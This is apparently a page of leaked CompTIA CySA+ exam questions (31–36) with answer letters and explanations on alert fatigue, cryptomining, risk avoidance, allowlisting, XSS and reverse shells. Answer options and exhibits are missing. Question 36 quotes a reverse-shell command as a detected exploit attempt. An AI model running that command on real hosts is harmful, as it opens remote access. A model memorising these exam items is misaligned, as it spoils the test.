Question 31

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

Correct Answer:D
The MTTR (Mean Time to Resolution) decreases by 20% is the best possible outcome that this effort hopes to achieve, as it reflects the improvement in the efficiency and effectiveness of the incident response process by reducing analyst alert fatigue. Analyst alert fatigue is a term that refers to the phenomenon of security analysts becoming overwhelmed, desensitized, or exhausted by the large number of alerts they receive from various security tools or systems, such as DLP (Data Loss Prevention) or CASB (Cloud Access Security Broker). DLP is a security solution that helps to prevent unauthorized access, use, or transfer of sensitive data, such as personal information, intellectual property, or financial records. CASB is a security solution that helps to monitor and control the use of cloud-based applications and services, such as SaaS (Software as a Service), PaaS (Platform as a Service), or IaaS (Infrastructure as a Service). Both DLP and CASB can generate alerts when they detect potential data breaches, policy violations, or malicious activities, but they can also produce false positives, irrelevant information, or duplicate notifications that can overwhelm or distract the security analysts. Analyst alert fatigue can have negative consequences for the security posture and performance of an organization, such as missing or ignoring critical alerts, delaying or skipping investigations or remediations, making errors or mistakes, or losing motivation or morale. Therefore, it is important to reduce analyst alert fatigue and optimize the alert management process by using various strategies, such as tuning the alert thresholds and rules, prioritizing and triaging the alerts based on severity and context, enriching and correlating the alerts with additional data sources, automating or orchestrating repetitive or low-level tasks or actions, or integrating and consolidating different security tools or systems into a unified platform. By reducing analyst alert fatigue and optimizing the alert management process, the effort hopes to achieve a decrease in the MTTR, which is a metric that measures the average time it takes to resolve an incident from the moment it is reported to the moment it is closed. A lower MTTR indicates a faster and more effective incident response process, which can help to minimize the impact and damage of security incidents, improve customer satisfaction and trust, and enhance security operations and outcomes. The other options are not as relevant or realistic as the MTTR decreases by 20%, as they do not reflect the best possible outcome that this effort hopes to achieve. SIEM ingestion logs are reduced by 20% is not a relevant outcome, as it does not indicate any improvement in the incident response process or any reduction in analyst alert fatigue. SIEM (Security Information and Event Management) is a security solution that collects and analyzes data from various sources, such as logs, events, or alerts, and provides security monitoring, threat detection, and incident response capabilities. SIEM ingestion logs are records of the data that is ingested by the SIEM system from different sources. Reducing SIEM ingestion logs may imply less data volume or less data sources for the SIEM system, which may not necessarily improve its performance or accuracy. Phishing alerts drop by 20% is not a realistic outcome, as it does not depend on the integration of DLP and CASB or any reduction in analyst alert fatigue. Phishing alerts are notifications that indicate potential phishing attempts or attacks, such as fraudulent emails, websites, or messages that try to trick users into revealing sensitive information or installing malware. Phishing alerts can be generated by various security tools or systems, such as email security solutions, web security solutions, endpoint security solutions, or user awareness training programs. Reducing phishing alerts may imply less phishing attempts or attacks on the organization, which may not necessarily be influenced by the integration of DLP and CASB or any reduction in analyst alert fatigue. False positive rates drop to 20% is not a realistic outcome

Question 32

A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that crypto mining is occurring. Which of the following indicators would
most likely lead the team to this conclusion?

Correct Answer:A
High GPU utilization is the most likely indicator that cryptomining is occurring, as it reflects the intensive computational work that is required to solve the complex mathematical problems involved in mining cryptocurrencies. Cryptomining is the process of generating new units of a cryptocurrency by using computing power to verify transactions and create new blocks on the blockchain. Cryptomining can be done legitimately by individuals or groups who participate in a mining pool and share the rewards, or illegitimately by threat actors who use malware or scripts to hijack the computing resources of unsuspecting victims and use them for their own benefit. This practice is called cryptojacking, and it can cause performance degradation, increased power consumption, and security risks for the affected systems. Cryptomining typically relies on the GPU (graphics processing unit) rather than the CPU (central processing unit), as the GPU is better suited for parallel processing and can handle more calculations per second. Therefore, a high GPU utilization rate can be a sign that cryptomining is taking place on a system, especially if there is no other explanation for the increased workload. The other options are not as indicative of cryptomining as high GPU utilization, as they can have other causes or explanations. Bandwidth consumption can be affected by many factors, such as network traffic, streaming services, downloads, or updates. It is not directly related to cryptomining, which does not require a lot of bandwidth to communicate with the mining pool or the blockchain network. Unauthorized changes can be a result of many types of malware or cyberattacks, such as ransomware, spyware, or trojans. They are not specific to cryptomining, which does not necessarily alter any files or settings on the system, but rather uses its processing power. Unusual traffic spikes can also be caused by various factors, such as legitimate surges in demand, distributed denial-of-service attacks, or botnets. They are not indicative of cryptomining, which does not generate a lot of traffic or requests to or from the system.

Question 33

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

Correct Answer:A
Avoid is a risk management principle that describes the decision or action of not engaging in an activity or accepting a risk that is deemed too high or unacceptable. Avoiding a risk can eliminate the possibility or impact of the risk, as well as the need for any further risk management actions. In this case, the CISO decided the risk score would be too high and refused the software request. This indicates that the CISO selected the avoid principle for risk management.

Question 34

An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed?

Correct Answer:B
The correct answer is B. Allowlisting.
Allowlisting is a technique that allows only pre-approved web-based software to run on a system or network, while blocking all other software. Allowlisting can help prevent unauthorized or malicious software from compromising the security of an organization. Allowlisting can be implemented using various methods, such as application control, browser extensions, firewall rules, or proxy servers12.
The other options are not the best techniques to ensure that users only leverage web-based software that has been pre-approved by the organization. Blocklisting (A) is a technique that blocks specific web-based software from running on a system or network, while allowing all other software. Blocklisting can be ineffective or inefficient, as it requires constant updates and may not catch all malicious software. Graylisting © is a technique that temporarily rejects or delays incoming messages from unknown or suspicious sources, until they are verified as legitimate. Graylisting is mainly used for email filtering, not for web-based software control. Webhooks (D) are a technique that allows web-based software to send or receive data from other web-based software in real time, based on certain events or triggers. Webhooks are not related to web-based software control, but rather to web-based software integration.

Question 35

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:
CS0-003 dumps exhibit
Which of the following vulnerability types is the security analyst validating?

Correct Answer:B
XSS (cross-site scripting) is the vulnerability type that the security analyst is validating, as the snippet shows an attempt to inject a script tag into the web application. XSS is a web security vulnerability that allows an attacker to execute arbitrary JavaScript code in the browser of another user who visits the vulnerable website. XSS can be used to perform various malicious actions, such as stealing cookies, session hijacking, phishing, or defacing websites. The other vulnerability types are not relevant to the snippet, as they involve different kinds of attacks. Directory traversal is an attack that allows an attacker to access files and directories that are outside of the web root folder. XXE (XML external entity) injection is an attack that allows an attacker to interfere with an application’s processing of XML data, and potentially access files or systems. SSRF (server-side request forgery) is an attack that allows an attacker to induce the server-side application to make requests to an unintended location. Official References:
CS0-003 dumps exhibit
CS0-003 dumps exhibit
CS0-003 dumps exhibit

Question 36

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/ 0>$l
Which of the following is being attempted?

Correct Answer:B
A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user’s system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command:
sh -i >& /dev/udp/ 0>$l
This command is a shell script that creates a reverse shell connection from the target system to the remote user’s system at IP address and port 4821 using UDP protocol.